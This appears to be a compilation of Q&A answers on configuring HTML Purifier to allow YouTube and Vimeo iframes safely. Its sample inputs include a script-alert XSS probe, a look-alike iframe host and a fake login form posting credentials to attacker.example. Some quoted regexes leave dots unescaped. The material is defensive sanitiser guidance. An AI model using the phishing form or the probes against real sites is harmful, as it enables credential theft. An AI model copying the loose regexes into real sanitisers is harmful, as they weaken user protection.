HTMLPurifier Removing Allowfullscreen From YouTube Videos
"allowfullscreen" is not an attribute HTML Purifier inherently recognises for IFrames, which means that if you want to support it, you will need to customise your HTML Purifier module. Something like this should do it (this code was not tested, but should set you on the right path):
$config = HTMLPurifier_Config::createDefault();
// ...
$config->set('HTML.DefinitionID', 'enduser-customize.html tutorial');
$config->set('HTML.DefinitionRev', 1);
$config->set('Cache.DefinitionImpl', null); // remove this later!
$def = $config->getHTMLDefinition(true);
$def->addAttribute('iframe', 'allowfullscreen', 'Bool');
See if that helps you any? Some additional considerations were posted in this answer from 2016 here on stackoverflow, if you notice yourself getting stuck (but beware that if you use the HTML.AllowedElements and HTML.AllowedAttributes configurations, those are complete whitelists - if you use those directives to whitelist only iframe, any other HTML tags will be stripped).
HTMLPurifier stripping out YouTube
There were two issues with my original code. First, the regex was invalid - it did not account for http:. That was replaced with '%^(https?:)?(\/\/www\.youtube(?:-nocookie)?\.com\/embed\/|\/\/player\.vimeo\.com\/)%'.
Secondly, $config->set('AutoFormat.RemoveEmpty', true); appears to be removing the iframe (which makes sense). Adding the following fixed this:
$config->set('AutoFormat.RemoveEmpty.Predicate', [
    'iframe' => ['src'],
]);
Thanks to Edward Yang for his help on this!
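An added, runnable illustration of the two fixes above (not code from the original answer): the corrected regex accepting scheme-relative as well as http(s) embeds, and the RemoveEmpty predicate that keeps an <iframe> only when it carries a src. Newer HTML Purifier releases ship a default predicate that already contains iframe => src; setting it explicitly as below is harmless and makes the behaviour visible. The autoload path, VIDEOID and the host attacker.example are assumptions.

```php
<?php
// Added example, not code from the original answer.
require_once 'vendor/autoload.php'; // assumes HTML Purifier installed via Composer

$config = HTMLPurifier_Config::createDefault();
$config->set('HTML.SafeIframe', true);

// Accept scheme-relative (//...) embeds alongside http(s). Every '.' is escaped
// and the pattern is anchored at ^, so a host such as
// www.youtube.com.attacker.example cannot satisfy it.
$config->set(
    'URI.SafeIframeRegexp',
    '%^(https?:)?(//www\.youtube(?:-nocookie)?\.com/embed/|//player\.vimeo\.com/video/)%'
);

// RemoveEmpty drops elements that have no children; an <iframe> never has any.
$config->set('AutoFormat.RemoveEmpty', true);
// The predicate lists, per element, attributes whose presence makes the
// element worth keeping even though it is empty.
$config->set('AutoFormat.RemoveEmpty.Predicate', ['iframe' => ['src']]);

$purifier = new HTMLPurifier($config);

// Constructed inputs covering the cases that matter.
$samples = [
    'embed with src'     => '<p>intro</p><iframe src="//www.youtube.com/embed/VIDEOID"></iframe>',
    'iframe without src' => '<p>intro</p><iframe width="560" height="315"></iframe>',
    // src fails the whitelist, is dropped, and the now src-less iframe is removed too
    'look-alike host'    => '<p>intro</p><iframe src="https://www.youtube.com.attacker.example/embed/x"></iframe>',
    'empty paragraph'    => '<p></p><p>kept</p>',
];

foreach ($samples as $label => $dirty) {
    printf("%-20s %s\n", $label . ':', $purifier->purify($dirty));
}
```

The look-alike case shows why the predicate is keyed on src rather than on the element alone: once the URI filter rejects the attribute, RemoveEmpty finishes the job instead of leaving an empty frame behind.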
HTML Purifier - iframe and scripts
You were half on the right track. If you set HTML.SafeIframe to true and URI.SafeIframeRegexp to the URLs you want to accept (%^https://(www.youtube.com/embed/|player.vimeo.com/video/)% works fine), an input example of:
<p>content...<p>
<iframe src="https://www.youtube.com/embed/blep"></iframe>
<script>alert('abc');</script>
<p>content2</p>
...turns into...
<p>content...</p><p>
<iframe src="https://www.youtube.com/embed/blep"></iframe>
</p><p>content2</p>
Explanation: HTML.SafeIframe allows the <iframe> tag, but HTML Purifier still expects a whitelist for the URLs that the iframe can contain, since otherwise an <iframe> opens too much malicious potential. URI.SafeIframeRegexp supplies the whitelist (in the form of a regex that needs to be matched).
See if that works for you!
Code
This is the code that made the transformation I just mentioned:
$dirty = '<p>content...<p>
<iframe src="https://www.youtube.com/embed/blep"></iframe>
<script>alert(\'abc\');</script>
<p>content2</p>';
$config = HTMLPurifier_Config::createDefault();
$config->set('HTML.SafeIframe', true);
$config->set('URI.SafeIframeRegexp', '%^https://(www.youtube.com/embed/|player.vimeo.com/video/)%');
$purifier = new HTMLPurifier($config);
$clean = $purifier->purify($dirty);
Regarding HTML.Trusted
I implore you to never set HTML.Trusted to true if you don't fully trust each and every one of the people submitting the HTML.
Amongst other things, it allows forms in your input HTML to survive the purification unmolested, which (if you're purifying for a website, which I assume you are) makes phishing attacks trivial. It allows your input to use style tags which survive unscathed. There are some things it will still strip (any HTML tag that HTML Purifier doesn't actually know anything about, i.e. most HTML5 tags, and various JavaScript attribute handlers as well), but there are enough attack vectors that you might as well not be purifying if you use this directive. As Ambush Commander once put it:
You shouldn't be using %HTML.Trusted anyway; it really ought to be named %HTML.Unsafe or something.
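The phishing point above, made concrete as an added example (not code from the original answer): the same constructed input, a fake login form posting to a third-party host, is purified once with the default configuration and once with HTML.Trusted turned on. The autoload path and the host attacker.example are assumptions.

```php
<?php
// Added example, not code from the original answer.
require_once 'vendor/autoload.php'; // assumes HTML Purifier installed via Composer

function purifyWith(bool $trusted, string $html): string
{
    $config = HTMLPurifier_Config::createDefault();
    // The only difference between the two runs below is this directive.
    $config->set('HTML.Trusted', $trusted);
    return (new HTMLPurifier($config))->purify($html);
}

// Constructed input: a credential-harvesting form next to harmless content.
// With HTML.Trusted off, the Forms module is not loaded and the <form> and
// <input> elements are dropped, leaving the text; with it on, the form is
// emitted as-is and will post to the attacker's host when rendered.
$dirty = <<<'HTML'
<p>Your session has expired. Please sign in again:</p>
<form method="post" action="https://attacker.example/collect">
  <input type="text" name="user">
  <input type="password" name="pass">
  <input type="submit" value="Sign in">
</form>
<p><a href="https://example.com/docs">Documentation</a></p>
HTML;

echo "--- HTML.Trusted = false (default) ---\n";
echo purifyWith(false, $dirty), "\n\n";

echo "--- HTML.Trusted = true ---\n";
echo purifyWith(true, $dirty), "\n";
```

If you need a single trusted element (a form, an iframe, an object), reach for the targeted directives such as HTML.SafeIframe or HTML.SafeObject, or extend the definition for that one element, rather than switching the whole input to trusted.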
Allow embed/object/param HTML tags with HTMLPurifier?
The best solution you have is http://htmlpurifier.org/docs/enduser-youtube.html
Allowing YouTube embed with HTMLPurifier on Laravel 4 and mewebstudio/Purifier
HTMLPurifier already has a filter ready-made for YouTube videos; make sure you use it.
To use it, make sure you have this line in your config:
'Filter.YouTube' => true
Your final config file would look like this:
return array(
    'encoding' => 'UTF-8',
    'finalize' => true,
    'preload' => false,
    'settings' => array(
        'default' => array(
            'HTML.Doctype' => 'XHTML 1.0 Strict',
            'HTML.Allowed' => 'div[style],b,strong,i,em,a[href|title|style],ul,ol,li,p[style],br,span[style],'
                . 'img[width|height|alt|src],h1[style],h2[style],h3[style],h4[style],h5[style],table[class|style|summary],tr,td[abbr],tbody,thead',
            'CSS.AllowedProperties' => 'font,font-size,font-weight,font-style,font-family,text-decoration,padding-left,color,background-color,text-align',
            'HTML.SafeObject' => true,
            'Output.FlashCompat' => true,
            'HTML.SafeIframe' => true,
            'URI.SafeIframeRegexp' => '%^(http://|https://|//)(www.youtube.com/embed/|player.vimeo.com/video/)%',
            'AutoFormat.AutoParagraph' => true,
            'AutoFormat.RemoveEmpty' => true,
            'HTML.Nofollow' => true,
            'URI.Host' => 'domain.com',
            'Filter.YouTube' => true,
        ),
    ),
);
Yii1 - HtmlPurifier removes allowfullscreen attribute
There is already a useful link which solves this. We need to implement a custom class to allow the "allowfullscreen" attribute. This will add the attribute to the purified iframe code.
Reference
http://sachachua.com/blog/2011/08/drupal-html-purifier-embedding-iframes-youtube/
Answered by Sonny
HTMLPurifier iframe Vimeo and Youtube video
Steps
1) Include the class from the above URL.
2) Set Filter.Custom exactly in the way shown in the above URL.
Setting HTML Purifier options can differ between frameworks.